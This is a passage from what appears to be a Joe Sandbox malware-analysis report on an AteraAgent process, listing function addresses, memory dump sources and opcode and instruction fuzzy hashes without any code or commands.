                                                                                                                                                                                                                                                                                                • Instruction ID: c1753f4225be1591a1fcd8a234b5fcc08b06fca1d2dc86342fdd96c790eaead7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 369fb86ef4a9b03e3509c819d041809b52ae22909e9ef59cf33387e49f5c1218
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B419371E0AA4D8FDB64EFA8D4616ECB7B1FF59300F12007ED009E72A1CA75A941CB41
                                                                                                                                                                                                                                                                                                Function 00007FFD9B392959 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 079cfe14cee82b9c0d10d9c64ee18ab4b122a025752dcae1de98d221a8bf9f0f
                                                                                                                                                                                                                                                                                                • Instruction ID: a12e5d6791172b272586de584d990f675f8aba547e683c9ab0d70a2d872baead
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 079cfe14cee82b9c0d10d9c64ee18ab4b122a025752dcae1de98d221a8bf9f0f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA31E212A0FA9A4FE32AA3B86C765E53FA0DF4322470A41F7D098CA1E3D90D5C478355
                                                                                                                                                                                                                                                                                                Function 00007FFD9B5A1845 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: a357ed0d1734587d4c47e6eb157af16dd9141b9750e0550669005cf4ef51893c
                                                                                                                                                                                                                                                                                                • Instruction ID: a83e13882c8579b36fab208428d93a6531fd494708cb092ac8be93f0e75aa0d6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a357ed0d1734587d4c47e6eb157af16dd9141b9750e0550669005cf4ef51893c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C031D62070DB5C5FD7A5E65C98657767BD1EF86720F0502AEE489C32E3CA24AD41C7C2
                                                                                                                                                                                                                                                                                                Function 00007FFD9B387180 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 0d85755642d010ef3d86502c1547a82e05eeff8aaf5c3d7294e10491d294910e
                                                                                                                                                                                                                                                                                                • Instruction ID: ed0355ec8356a019cbb87e6c953fa1c4d3218759d84df4447a4278284b25d70f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0d85755642d010ef3d86502c1547a82e05eeff8aaf5c3d7294e10491d294910e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3331B232B09C1D8FEBA4FB5C94597B977E1FB98350F45017AE40DC72A5DE24AC024781
                                                                                                                                                                                                                                                                                                Function 00007FFD9B393E5F Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 5033d78cb2096a47d3dcfa6df71074192371bcac1a08845662b2afcd0f1891d8
                                                                                                                                                                                                                                                                                                • Instruction ID: 6d6db17bbf209b311373ac6189afcb71672b8874f986e7a8a8207acb8d7ee33c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5033d78cb2096a47d3dcfa6df71074192371bcac1a08845662b2afcd0f1891d8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A931F532B1ED284BE368EA5CB8565F573C0EF897A5B0002BFE44DC32A6CD566C4682C5
                                                                                                                                                                                                                                                                                                Function 00007FFD9B39CAC8 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 44811610fe9f10e98c0bc10041f5166c3264fd881992b94f4476948ffb5dbb0d
                                                                                                                                                                                                                                                                                                • Instruction ID: c3678360b2a01f1b1dcbb9a317f5b59b6225ebb2bcc384b5fbfdddec900625a0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44811610fe9f10e98c0bc10041f5166c3264fd881992b94f4476948ffb5dbb0d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6316713B0EE8E0FE7B9E6AC44656B527D2DF95260B6A41FEC04DC32D6EC08BD064381
                                                                                                                                                                                                                                                                                                Function 00007FFD9B390648 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 390a6bbd1b65584e3afa613204232c4980a1cb229280ce93968fb7a9b8318103
                                                                                                                                                                                                                                                                                                • Instruction ID: 3e9cccc8510c0204ed888cbad51889f4719674121ee820527b39cd4fe6e01f84
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 390a6bbd1b65584e3afa613204232c4980a1cb229280ce93968fb7a9b8318103
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5531F431B1DA49CEE7A0E66C9494676B7C1EFA8324F05057FE44DD22F1CB18EA81C386
                                                                                                                                                                                                                                                                                                Function 00007FFD9B397918 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: c66015ab563b77a2ca1c3964e745b5dfd57b9cac61867c9ccdc1caa8606ea988
                                                                                                                                                                                                                                                                                                • Instruction ID: 3de8e24cdd764499489171b8295f1364daaa379ce9e79d6026b317e5c85240dc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c66015ab563b77a2ca1c3964e745b5dfd57b9cac61867c9ccdc1caa8606ea988
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E221063171D94C4FE7A8EA6C9869AA13BD1EF5A350B0500FBD84CC72F7EE159D868341
                                                                                                                                                                                                                                                                                                Function 00007FFD9B392DCD Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: b54d79300120b2e87368ce22382c0f8720028aadc081ca611046d07561190724
                                                                                                                                                                                                                                                                                                • Instruction ID: 5766e090d224d598537073b0f217c25671a33794594b2d21f71400acaa98bddc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b54d79300120b2e87368ce22382c0f8720028aadc081ca611046d07561190724
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1731D73170DE998FD769E7388064AA177E1FF9A300B1941AEC44DC72A6DD25E906C781
                                                                                                                                                                                                                                                                                                Function 00007FFD9B399E4A Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 8a99f2c7eae9d149a8b36731c15a79a2e6f51b505466aef05884f6d9bba1acb8
                                                                                                                                                                                                                                                                                                • Instruction ID: 704bf64039ca89dc12d686560014633cc3bf3f532bb9fe6639f68c9934e830f5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a99f2c7eae9d149a8b36731c15a79a2e6f51b505466aef05884f6d9bba1acb8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E921373170EA5D8FE7A8E69DD859A7537D4EF56320F0502AEE48EC72A2D914EC028341
                                                                                                                                                                                                                                                                                                Function 00007FFD9B595F01 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: b3cf1faef0bd2ea47e9faaf0ab9e2c770f043e10035960387e9e20c9dd987d8c
                                                                                                                                                                                                                                                                                                • Instruction ID: e8444430e78c0274e4b94fe0d7a8b9a04306587043a8c3b48e22b524524a6f60
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3cf1faef0bd2ea47e9faaf0ab9e2c770f043e10035960387e9e20c9dd987d8c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2316A71B1EB4D4FE7EADB289061A7877E1FF54344B9101B9C40A871D7CE25F9468780
                                                                                                                                                                                                                                                                                                Function 00007FFD9B394000 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 47ef52083516205bb886d1fbf98ee96ba7a20d1a1690c4b065eb29ed7dbda421
                                                                                                                                                                                                                                                                                                • Instruction ID: e128432b345fc85e964be565f6eaa0f1e0df3f818d9d825f758e0c80838ba80b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47ef52083516205bb886d1fbf98ee96ba7a20d1a1690c4b065eb29ed7dbda421
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A721E622B0EE0E8FEBE8F65C546427923C2EB98361B5641BAD80EC32D9DD15EC428340
                                                                                                                                                                                                                                                                                                Function 00007FFD9B59DED8 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 93a8f97fb84c33a48d6f48bb33049e1d3f802b1a2d9bb87a9b2bfcd21947b7b3
                                                                                                                                                                                                                                                                                                • Instruction ID: 5280ef427933b525faab89364514b18019e49061431d040fd3d6e1138ec3f08e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93a8f97fb84c33a48d6f48bb33049e1d3f802b1a2d9bb87a9b2bfcd21947b7b3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C21C362B19E4F4FEBE8DA9C689457573D1EBA8250701027ED00DC329AEE25FD428780
                                                                                                                                                                                                                                                                                                Function 00007FFD9B596B12 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 1594b0f3d30a81ff6fec0018eacc42845f5ec3068edeefa618d76a3156665093
                                                                                                                                                                                                                                                                                                • Instruction ID: 5cbe3ed170f9e651463f7b3b3332d14c5f9af289253531f9758643e1b5be24b3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1594b0f3d30a81ff6fec0018eacc42845f5ec3068edeefa618d76a3156665093
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1031F322B0EBC94FE7A6977848781613FF2EF9675074900EBD488CB1B3E9196C0A8351
                                                                                                                                                                                                                                                                                                Function 00007FFD9B396E59 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 74db6b31930bc70684d6d57ec950547aebdf45daffe2da11e062a4b7f0145226
                                                                                                                                                                                                                                                                                                • Instruction ID: 1046a7a1ff97ad5fc92e254ed2ab2bd6fa19d89e69b181ca2d4881a5cb79b4d4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 74db6b31930bc70684d6d57ec950547aebdf45daffe2da11e062a4b7f0145226
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24313872A0DF8A4FE764EB28C869565BBD0EFA5350F0545BED08AC71E2DE24E941C342
                                                                                                                                                                                                                                                                                                Function 00007FFD9B5A47F2 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 1caea88e408d850e3095224c2a2c3dadd43c8e059983f3062930dca8b3a702a4
                                                                                                                                                                                                                                                                                                • Instruction ID: 038e9d6411b5d99c7cef2908c34218d432c40f544c7fbf55cc4dd3d57ca76499
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1caea88e408d850e3095224c2a2c3dadd43c8e059983f3062930dca8b3a702a4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09310762A0FBCB1FD7A686BC68A51A47BE0EF5621470A01FBC098CB1D7D9147C068380
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38E918 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 48d8a7561befb95a7154985148a38bf69cfbe940a6d5039ff750e1e51da90f6a
                                                                                                                                                                                                                                                                                                • Instruction ID: 03c851110b3e1c44218c087905a1eddbcb3328891eb4dd63712bd440fa47ca26
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48d8a7561befb95a7154985148a38bf69cfbe940a6d5039ff750e1e51da90f6a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4310852B0F9CA8FE762E77C88655657FD0DF5668070984FED089CB1F6D914AC05C340
                                                                                                                                                                                                                                                                                                Function 00007FFD9B591326 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 34f6748cd24d7df3675a98954f6a8e950bb052c6e34804f6ff0e70c86d30caaa
                                                                                                                                                                                                                                                                                                • Instruction ID: beab099d01bcf0a36c1f61fba542a8dd5a4b890179cdb954a407420c581b32d9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f6748cd24d7df3675a98954f6a8e950bb052c6e34804f6ff0e70c86d30caaa
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F317B6270EACA1FF39297BC48251E13BF5DF5A290B0D01EBD849CB5A7EC19A9068351
                                                                                                                                                                                                                                                                                                Function 00007FFD9B396D49 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 46e6ea37d02599f2069b2ddf89a74af08219d49fa693d4c8ec56cc229d81c862
                                                                                                                                                                                                                                                                                                • Instruction ID: 22d47f17093efaecbe6c3df04f7a2e2aed434177fd4e19a3a02af982ae6848fd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46e6ea37d02599f2069b2ddf89a74af08219d49fa693d4c8ec56cc229d81c862
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A031C552B0FACA8FE766E72C88655657FA0DF5668074A80FBC084CB1F7E918AD09C351
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38BE16 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ba1ec1035a07c73cfc2f42ed78d0b18296d3ed86154c2fb50a13ebd8e4c5f79b
                                                                                                                                                                                                                                                                                                • Instruction ID: 2d8f4bf86bfe31c7ffcf02ce44676fd566b650f833df053860198882bab2c12c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba1ec1035a07c73cfc2f42ed78d0b18296d3ed86154c2fb50a13ebd8e4c5f79b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0212E12B0EE8F0FE7A5F6AC54A52F477D1EB69250B0902BBC049C31A7ED696D464381
                                                                                                                                                                                                                                                                                                Function 00007FFD9B383AA5 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ee0825e455cc8c80ae4678c2f6887ddc11d3c5a59aa996e2d437612204c1f9db
                                                                                                                                                                                                                                                                                                • Instruction ID: 6002f2eea957a2922418a2d33260c8f8023ebc86194a35901446351b0ee8b587
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee0825e455cc8c80ae4678c2f6887ddc11d3c5a59aa996e2d437612204c1f9db
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39313B71E09A4D8FDB95DFA8C4515EDBBF0FF65700F4500AAD408DB2A2DB389A44CB51
                                                                                                                                                                                                                                                                                                Function 00007FFD9B392B6D Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 108b5f96226c94b514a6fc34a14b455fb2a6dbefe91c867276c4fb3696063509
                                                                                                                                                                                                                                                                                                • Instruction ID: ea6a1fe21a9795f95ebb3d753152434a91dfd5f07260d0ec37767e62a9833973
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 108b5f96226c94b514a6fc34a14b455fb2a6dbefe91c867276c4fb3696063509
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD212632F1F9190AF6B9A5BC38B51A46BC1DFD4664B4E12BFE44CC62A2E8075C424280
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3A5B30 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: c80e492822324658cfda654cd822bbe0d4e64e5311fadba03b66cf9cbe865d31
